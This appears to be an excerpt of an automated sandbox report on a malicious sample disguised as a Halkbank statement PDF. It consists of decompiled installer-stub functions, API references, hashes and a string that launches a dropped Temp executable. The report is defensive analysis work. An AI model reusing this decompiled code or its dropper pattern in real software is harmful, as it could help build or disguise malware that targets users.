                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: "C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj$A$C:\Users\user\AppData\Local\Temp$H7B
                                                                    • API String ID: 2624150263-3199491818
                                                                    • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                    • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                    • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                    • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 67%
                                                                    			E004021AA() {
                                                                    				signed int _t52;
                                                                    				void* _t56;
                                                                    				intOrPtr* _t60;
                                                                    				intOrPtr _t61;
                                                                    				intOrPtr* _t62;
                                                                    				intOrPtr* _t64;
                                                                    				intOrPtr* _t66;
                                                                    				intOrPtr* _t68;
                                                                    				intOrPtr* _t70;
                                                                    				intOrPtr* _t72;
                                                                    				intOrPtr* _t74;
                                                                    				intOrPtr* _t76;
                                                                    				intOrPtr* _t78;
                                                                    				intOrPtr* _t80;
                                                                    				void* _t83;
                                                                    				intOrPtr* _t91;
                                                                    				signed int _t101;
                                                                    				signed int _t105;
                                                                    				void* _t107;
                                                                    
                                                                    				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                                    				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                                    				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                                    				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                                    				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                                    				_t52 =  *(_t107 - 0x20);
                                                                    				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                                    				_t101 = _t52 & 0x00008000;
                                                                    				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                                    				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                                    				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                                    					E00402DA6(0x21);
                                                                    				}
                                                                    				_t56 = _t107 + 8;
                                                                    				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                                                                    				if(_t56 < _t83) {
                                                                    					L14:
                                                                    					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                                    					_push(0xfffffff0);
                                                                    				} else {
                                                                    					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                                    					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                                                                    					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                                    					if(_t61 >= _t83) {
                                                                    						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                                    						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                                    						if(_t101 == _t83) {
                                                                    							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                                    							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\alfons\\AppData\\Local\\Temp");
                                                                    						}
                                                                    						if(_t105 != _t83) {
                                                                    							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                                    							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                                    						}
                                                                    						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                                    						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                                    						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                                    						if( *_t91 != _t83) {
                                                                    							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                                    							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                                    						}
                                                                    						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                                    						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                                    						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                                    						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                                    						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                    							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                                    							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                                    						}
                                                                    						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                                    						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                                    					}
                                                                    					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                                    					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                                    					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                                    						_push(0xfffffff4);
                                                                    					} else {
                                                                    						goto L14;
                                                                    					}
                                                                    				}
                                                                    				E00401423();
                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                                                                    				return 0;
                                                                    			}






















                                                                    0x004021b3
                                                                    0x004021bd
                                                                    0x004021c7
                                                                    0x004021d1
                                                                    0x004021dc
                                                                    0x004021df
                                                                    0x004021f9
                                                                    0x004021fc
                                                                    0x00402202
                                                                    0x00402205
                                                                    0x0040220f
                                                                    0x00402213
                                                                    0x00402213
                                                                    0x00402218
                                                                    0x00402229
                                                                    0x00402231
                                                                    0x004022e8
                                                                    0x004022e8
                                                                    0x004022ef
                                                                    0x00402237
                                                                    0x00402237
                                                                    0x00402246
                                                                    0x0040224a
                                                                    0x0040224d
                                                                    0x00402253
                                                                    0x00402261
                                                                    0x00402264
                                                                    0x00402266
                                                                    0x00402271
                                                                    0x00402271
                                                                    0x00402276
                                                                    0x00402278
                                                                    0x0040227f
                                                                    0x0040227f
                                                                    0x00402282
                                                                    0x0040228b
                                                                    0x0040228e
                                                                    0x00402294
                                                                    0x00402296
                                                                    0x004022a0
                                                                    0x004022a0
                                                                    0x004022a3
                                                                    0x004022ac
                                                                    0x004022af
                                                                    0x004022b8
                                                                    0x004022be
                                                                    0x004022c0
                                                                    0x004022ce
                                                                    0x004022ce
                                                                    0x004022d1
                                                                    0x004022d7
                                                                    0x004022d7
                                                                    0x004022da
                                                                    0x004022e0
                                                                    0x004022e6
                                                                    0x004022fb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004022e6
                                                                    0x004022f1
                                                                    0x00402c2d
                                                                    0x00402c39

                                                                    APIs
                                                                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00402269
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                    • API String ID: 542301482-1943935188
                                                                    • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                    • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                    • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                                                                    • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 39%
                                                                    			E0040290B(short __ebx, short* __edi) {
                                                                    				void* _t21;
                                                                    
                                                                    				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                                    					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                                    					_push(_t21 - 0x2b0);
                                                                    					_push(__edi);
                                                                    					E00406668();
                                                                    				} else {
                                                                    					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                                    					 *__edi = __ebx;
                                                                    					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                    				}
                                                                    				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                                    				return 0;
                                                                    			}




                                                                    0x00402923
                                                                    0x0040293e
                                                                    0x00402949
                                                                    0x0040294a
                                                                    0x00402a94
                                                                    0x00402925
                                                                    0x00402928
                                                                    0x0040292b
                                                                    0x0040292e
                                                                    0x0040292e
                                                                    0x00402c2d
                                                                    0x00402c39

                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.334852083.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.334839900.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334863585.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334870631.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.334993696.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                    • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                    • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                                    • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                    				struct HWND__* _v8;
                                                                    				struct HWND__* _v12;
                                                                    				long _v16;
                                                                    				signed int _v20;
                                                                    				signed int _v24;
                                                                    				intOrPtr _v28;
                                                                    				signed char* _v32;
                                                                    				int _v36;
                                                                    				signed int _v44;
                                                                    				int _v48;
                                                                    				signed int* _v60;
                                                                    				signed char* _v64;
                                                                    				signed int _v68;
                                                                    				long _v72;
                                                                    				void* _v76;
                                                                    				intOrPtr _v80;
                                                                    				intOrPtr _v84;
                                                                    				void* _v88;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t198;
                                                                    				intOrPtr _t201;
                                                                    				long _t207;
                                                                    				signed int _t211;
                                                                    				signed int _t222;
                                                                    				void* _t225;
                                                                    				void* _t226;
                                                                    				int _t232;
                                                                    				long _t237;
                                                                    				long _t238;
                                                                    				signed int _t239;
                                                                    				signed int _t245;
                                                                    				signed int _t247;
                                                                    				signed char _t248;
                                                                    				signed char _t254;
                                                                    				void* _t258;
                                                                    				void* _t260;
                                                                    				signed char* _t278;
                                                                    				signed char _t279;
                                                                    				long _t284;
                                                                    				struct HWND__* _t291;
                                                                    				signed int* _t292;
                                                                    				int _t293;
                                                                    				long _t294;
                                                                    				signed int _t295;
                                                                    				void* _t297;
                                                                    				long _t298;
                                                                    				int _t299;
                                                                    				signed int _t300;
                                                                    				signed int _t303;
                                                                    				signed int _t311;
                                                                    				signed char* _t319;
                                                                    				int _t324;
                                                                    				void* _t326;
                                                                    
                                                                    				_t291 = _a4;
                                                                    				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                    				_v8 = GetDlgItem(_t291, 0x408);
                                                                    				_t326 = SendMessageW;
                                                                    				_v24 =  *0x42a288;
                                                                    				_v28 =  *0x42a270 + 0x94;
                                                                    				if(_a8 != 0x110) {
                                                                    					L23:
                                                                    					if(_a8 != 0x405) {
                                                                    						_t301 = _a16;
                                                                    					} else {
                                                                    						_a12 = 0;
                                                                    						_t301 = 1;
                                                                    						_a8 = 0x40f;
                                                                    						_a16 = 1;
                                                                    					}
                                                                    					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                    						_v16 = _t301;
                                                                    						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                    							if(( *0x42a279 & 0x00000002) != 0) {
                                                                    								L41:
                                                                    								if(_v16 != 0) {
                                                                    									_t237 = _v16;
                                                                    									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                    										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                    									}
                                                                    									_t238 = _v16;
                                                                    									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                    										_t301 = _v24;
                                                                    										_t239 =  *(_t238 + 0x5c);
                                                                    										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                    											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                    										} else {
                                                                    											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    								goto L48;
                                                                    							}
                                                                    							if(_a8 == 0x413) {
                                                                    								L33:
                                                                    								_t301 = 0 | _a8 != 0x00000413;
                                                                    								_t245 = E00404F7F(_v8, _a8 != 0x413);
                                                                    								_t295 = _t245;
                                                                    								if(_t295 >= 0) {
                                                                    									_t94 = _v24 + 8; // 0x8
                                                                    									_t301 = _t245 * 0x818 + _t94;
                                                                    									_t247 =  *_t301;
                                                                    									if((_t247 & 0x00000010) == 0) {
                                                                    										if((_t247 & 0x00000040) == 0) {
                                                                    											_t248 = _t247 ^ 0x00000001;
                                                                    										} else {
                                                                    											_t254 = _t247 ^ 0x00000080;
                                                                    											if(_t254 >= 0) {
                                                                    												_t248 = _t254 & 0x000000fe;
                                                                    											} else {
                                                                    												_t248 = _t254 | 0x00000001;
                                                                    											}
                                                                    										}
                                                                    										 *_t301 = _t248;
                                                                    										E0040117D(_t295);
                                                                    										_a12 = _t295 + 1;
                                                                    										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                                                                    										_a8 = 0x40f;
                                                                    									}
                                                                    								}
                                                                    								goto L41;
                                                                    							}
                                                                    							_t301 = _a16;
                                                                    							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                    								goto L41;
                                                                    							}
                                                                    							goto L33;
                                                                    						} else {
                                                                    							goto L48;
                                                                    						}
                                                                    					} else {
                                                                    						L48:
                                                                    						if(_a8 != 0x111) {
                                                                    							L56:
                                                                    							if(_a8 == 0x200) {
                                                                    								SendMessageW(_v8, 0x200, 0, 0);
                                                                    							}
                                                                    							if(_a8 == 0x40b) {
                                                                    								_t225 =  *0x42372c;
                                                                    								if(_t225 != 0) {
                                                                    									ImageList_Destroy(_t225);
                                                                    								}
                                                                    								_t226 =  *0x423740;
                                                                    								if(_t226 != 0) {
                                                                    									GlobalFree(_t226);
                                                                    								}
                                                                    								 *0x42372c = 0;
                                                                    								 *0x423740 = 0;
                                                                    								 *0x42a2c0 = 0;
                                                                    							}
                                                                    							if(_a8 != 0x40f) {
                                                                    								L90:
                                                                    								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
                                                                    									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                    									ShowWindow(_v8, _t324);
                                                                    									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                    								}
                                                                    								goto L93;
                                                                    							} else {
                                                                    								E004011EF(_t301, 0, 0);
                                                                    								_t198 = _a12;
                                                                    								if(_t198 != 0) {
                                                                    									if(_t198 != 0xffffffff) {
                                                                    										_t198 = _t198 - 1;
                                                                    									}
                                                                    									_push(_t198);
                                                                    									_push(8);
                                                                    									E00404FFF();
                                                                    								}
                                                                    								if(_a16 == 0) {
                                                                    									L75:
                                                                    									E004011EF(_t301, 0, 0);
                                                                    									_v36 =  *0x423740;
                                                                    									_t201 =  *0x42a288;
                                                                    									_v64 = 0xf030;
                                                                    									_v24 = 0;
                                                                    									if( *0x42a28c <= 0) {
                                                                    										L86:
                                                                    										if( *0x42a31e == 0x400) {
                                                                    											InvalidateRect(_v8, 0, 1);
                                                                    										}
                                                                    										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
                                                                    											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
                                                                    										}
                                                                    										goto L90;
                                                                    									}
                                                                    									_t292 = _t201 + 8;
                                                                    									do {
                                                                    										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                    										if(_t207 != 0) {
                                                                    											_t303 =  *_t292;
                                                                    											_v72 = _t207;
                                                                    											_v76 = 8;
                                                                    											if((_t303 & 0x00000001) != 0) {
                                                                    												_v76 = 9;
                                                                    												_v60 =  &(_t292[4]);
                                                                    												_t292[0] = _t292[0] & 0x000000fe;
                                                                    											}
                                                                    											if((_t303 & 0x00000040) == 0) {
                                                                    												_t211 = (_t303 & 0x00000001) + 1;
                                                                    												if((_t303 & 0x00000010) != 0) {
                                                                    													_t211 = _t211 + 3;
                                                                    												}
                                                                    											} else {
                                                                    												_t211 = 3;
                                                                    											}
                                                                    											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                    											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                    											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                    										}
                                                                    										_v24 = _v24 + 1;
                                                                    										_t292 =  &(_t292[0x206]);
                                                                    									} while (_v24 <  *0x42a28c);
                                                                    									goto L86;
                                                                    								} else {
                                                                    									_t293 = E004012E2( *0x423740);
                                                                    									E00401299(_t293);
                                                                    									_t222 = 0;
                                                                    									_t301 = 0;
                                                                    									if(_t293 <= 0) {
                                                                    										L74:
                                                                    										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                    										_a16 = _t293;
                                                                    										_a8 = 0x420;
                                                                    										goto L75;
                                                                    									} else {
                                                                    										goto L71;
                                                                    									}
                                                                    									do {
                                                                    										L71:
                                                                    										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                    											_t301 = _t301 + 1;
                                                                    										}
                                                                    										_t222 = _t222 + 1;
                                                                    									} while (_t222 < _t293);
                                                                    									goto L74;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                    							goto L93;
                                                                    						} else {
                                                                    							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                    							if(_t232 == 0xffffffff) {
                                                                    								goto L93;
                                                                    							}
                                                                    							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                    							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                    								_t294 = 0x20;
                                                                    							}
                                                                    							E00401299(_t294);
                                                                    							SendMessageW(_a4, 0x420, 0, _t294);
                                                                    							_a12 = _a12 | 0xffffffff;
                                                                    							_a16 = 0;
                                                                    							_a8 = 0x40f;
                                                                    							goto L56;
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					_v36 = 0;
                                                                    					_v20 = 2;
                                                                    					 *0x42a2c0 = _t291;
                                                                    					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
                                                                    					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
                                                                    					 *0x423734 =  *0x423734 | 0xffffffff;
                                                                    					_t297 = _t258;
                                                                    					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
                                                                    					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                    					 *0x42372c = _t260;
                                                                    					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                    					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
                                                                    					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                    						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                    					}
                                                                    					DeleteObject(_t297);
                                                                    					_t298 = 0;
                                                                    					do {
                                                                    						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                    						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                    							if(_t298 != 0x20) {
                                                                    								_v20 = 0;
                                                                    							}
                                                                    							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
                                                                    						}
                                                                    						_t298 = _t298 + 1;
                                                                    					} while (_t298 < 0x21);
                                                                    					_t299 = _a16;
                                                                    					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                    					_push(0x15);
                                                                    					E004045C4(_a4);
                                                                    					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                    					_push(0x16);
                                                                    					E004045C4(_a4);
                                                                    					_t300 = 0;
                                                                    					_v16 = 0;
                                                                    					if( *0x42a28c <= 0) {
                                                                    						L19:
                                                                    						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                    						goto L20;
                                                                    					} else {
                                                                    						_t319 = _v24 + 8;
                                                                    						_v32 = _t319;
                                                                    						do {
                                                                    							_t278 =  &(_t319[0x10]);
                                                                    							if( *_t278 != 0) {
                                                                    								_v64 = _t278;
                                                                    								_t279 =  *_t319;
                                                                    								_v88 = _v16;
                                                                    								_t311 = 0x20;
                                                                    								_v84 = 0xffff0002;
                                                                    								_v80 = 0xd;
                                                                    								_v68 = _t311;
                                                                    								_v44 = _t300;
                                                                    								_v72 = _t279 & _t311;
                                                                    								if((_t279 & 0x00000002) == 0) {
                                                                    									if((_t279 & 0x00000004) == 0) {
                                                                    										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                    									} else {
                                                                    										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                    									}
                                                                    								} else {
                                                                    									_v80 = 0x4d;
                                                                    									_v48 = 1;
                                                                    									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                    									_v36 = 1;
                                                                    									 *( *0x423740 + _t300 * 4) = _t284;
                                                                    									_v16 =  *( *0x423740 + _t300 * 4);
                                                                    								}
                                                                    							}
                                                                    							_t300 = _t300 + 1;
                                                                    							_t319 =  &(_v32[0x818]);
                                                                    							_v32 = _t319;
                                                                    						} while (_t300 <  *0x42a28c);
                                                                    						if(_v36 != 0) {
                                                                    							L20:
                                                                    							if(_v20 != 0) {
                                                                    								E004045F9(_v8);
                                                                    								goto L23;
                                                                    							} else {
                                                                    								ShowWindow(_v12, 5);
                                                                    								E004045F9(_v12);
                                                                    								L93:
                                                                    								return E0040462B(_a8, _a12, _a16);
                                                                    							}
                                                                    						}
                                                                    						goto L19;
                                                                    					}
                                                                    				}
                                                                    			}


























































                                                                    0x00405038
                                                                    0x00405051
                                                                    0x00405056
                                                                    0x0040505e
                                                                    0x00405064
                                                                    0x0040507a
                                                                    0x0040507d
                                                                    0x004052a8
                                                                    0x004052af
                                                                    0x004052c3
                                                                    0x004052b1
                                                                    0x004052b3
                                                                    0x004052b6
                                                                    0x004052b7
                                                                    0x004052be
                                                                    0x004052be
                                                                    0x004052cf
                                                                    0x004052dd
                                                                    0x004052e0
                                                                    0x004052f6
                                                                    0x0040536b
                                                                    0x0040536e
                                                                    0x00405370
                                                                    0x0040537a
                                                                    0x00405388
                                                                    0x00405388
                                                                    0x0040538a
                                                                    0x00405394
                                                                    0x0040539a
                                                                    0x0040539d
                                                                    0x004053a0
                                                                    0x004053bb
                                                                    0x004053a2
                                                                    0x004053ac
                                                                    0x004053ac
                                                                    0x004053a0
                                                                    0x00405394
                                                                    0x00000000
                                                                    0x0040536e
                                                                    0x004052fb
                                                                    0x00405306
                                                                    0x0040530b
                                                                    0x00405312
                                                                    0x00405317
                                                                    0x0040531b
                                                                    0x00405326
                                                                    0x00405326
                                                                    0x0040532a
                                                                    0x0040532e
                                                                    0x00405332
                                                                    0x00405345
                                                                    0x00405334
                                                                    0x00405334
                                                                    0x0040533b
                                                                    0x00405341
                                                                    0x0040533d
                                                                    0x0040533d
                                                                    0x0040533d
                                                                    0x0040533b
                                                                    0x00405349
                                                                    0x0040534b
                                                                    0x0040535e
                                                                    0x00405361
                                                                    0x00405364
                                                                    0x00405364
                                                                    0x0040532e
                                                                    0x00000000
                                                                    0x0040531b
                                                                    0x004052fd
                                                                    0x00405304
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004053be
                                                                    0x004053be
                                                                    0x004053c5
                                                                    0x00405436
                                                                    0x0040543e
                                                                    0x00405446
                                                                    0x00405446
                                                                    0x0040544f
                                                                    0x00405451
                                                                    0x00405458
                                                                    0x0040545b
                                                                    0x0040545b
                                                                    0x00405461
                                                                    0x00405468
                                                                    0x0040546b
                                                                    0x0040546b
                                                                    0x00405471
                                                                    0x00405477
                                                                    0x0040547d
                                                                    0x0040547d
                                                                    0x0040548a
                                                                    0x004055eb
                                                                    0x004055f2
                                                                    0x0040560f
                                                                    0x00405615
                                                                    0x00405627
                                                                    0x00405627
                                                                    0x00000000
                                                                    0x00405490
                                                                    0x00405492
                                                                    0x00405497
                                                                    0x0040549c
                                                                    0x004054a1
                                                                    0x004054a3
                                                                    0x004054a3
                                                                    0x004054a4
                                                                    0x004054a5
                                                                    0x004054a7
                                                                    0x004054a7
                                                                    0x004054af
                                                                    0x004054f0
                                                                    0x004054f2
                                                                    0x00405502
                                                                    0x00405505
                                                                    0x0040550a
                                                                    0x00405511
                                                                    0x00405514
                                                                    0x004055b6
                                                                    0x004055bf
                                                                    0x004055c7
                                                                    0x004055c7
                                                                    0x004055d5
                                                                    0x004055e6
                                                                    0x004055e6
                                                                    0x00000000
                                                                    0x004055d5
                                                                    0x0040551a
                                                                    0x0040551d
                                                                    0x00405523
                                                                    0x00405528
                                                                    0x0040552a
                                                                    0x0040552c
                                                                    0x00405532
                                                                    0x00405539
                                                                    0x0040553e
                                                                    0x00405545
                                                                    0x00405548
                                                                    0x00405548
                                                                    0x0040554f
                                                                    0x0040555b
                                                                    0x0040555f
                                                                    0x00405561
                                                                    0x00405561
                                                                    0x00405551
                                                                    0x00405553
                                                                    0x00405553
                                                                    0x00405581
                                                                    0x0040558d
                                                                    0x0040559c
                                                                    0x0040559c
                                                                    0x0040559e
                                                                    0x004055a1
                                                                    0x004055aa
                                                                    0x00000000
                                                                    0x004054b1
                                                                    0x004054bc
                                                                    0x004054bf
                                                                    0x004054c4
                                                                    0x004054c6
                                                                    0x004054ca
                                                                    0x004054da
                                                                    0x004054e4
                                                                    0x004054e6
                                                                    0x004054e9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004054cc
                                                                    0x004054cc
                                                                    0x004054d2
                                                                    0x004054d4
                                                                    0x004054d4
                                                                    0x004054d5
                                                                    0x004054d6
                                                                    0x00000000
                                                                    0x004054cc
                                                                    0x004054af
                                                                    0x0040548a
                                                                    0x004053cd
                                                                    0x00000000
